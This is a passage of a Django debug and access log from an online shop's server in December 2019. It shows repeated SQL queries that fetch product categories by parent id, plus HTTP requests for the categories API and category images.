"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:38:25,953 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:38:25,957 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:38:25,961 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:38:25,966 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:38:25,972 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:38:25,978 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:38:25,983 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:38:25,987 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:38:25,991 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:38:25,998 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:38:26,003 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:38:26,008 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:38:26,013 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:38:26,017 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:38:26,021 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:38:26,026 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:38:26,030 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:38:26,035 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:38:26,040 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:38:26,044 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:38:26] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 05:38:41,142 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:38:41,153 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:38:41,159 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:38:41,163 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:38:41,169 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 05:38:41,173 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:38:41,178 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:38:41,182 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:38:41,186 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:38:41,192 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:38:41,196 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:38:41,199 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:38:41,203 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:38:41,210 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:38:41,215 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:38:41,220 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:38:41,224 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:38:41,228 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:38:41,232 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:38:41,239 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:38:41,243 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:38:41,248 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:38:41,252 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:38:41,256 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:38:41,260 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:38:41,267 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:38:41,271 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:38:41,275 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:38:41,279 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:38:41,284 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:38:41,290 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:38:41,294 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:38:41,298 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:38:41,302 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:38:41,306 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:38:41,313 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:38:41,317 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:38:41,321 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:38:41,325 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:38:41,329 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:38:41,333 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:38:41,338 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:38:41,342 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:38:41,346 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:38:41,351 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:38:41,355 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:38:41] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET 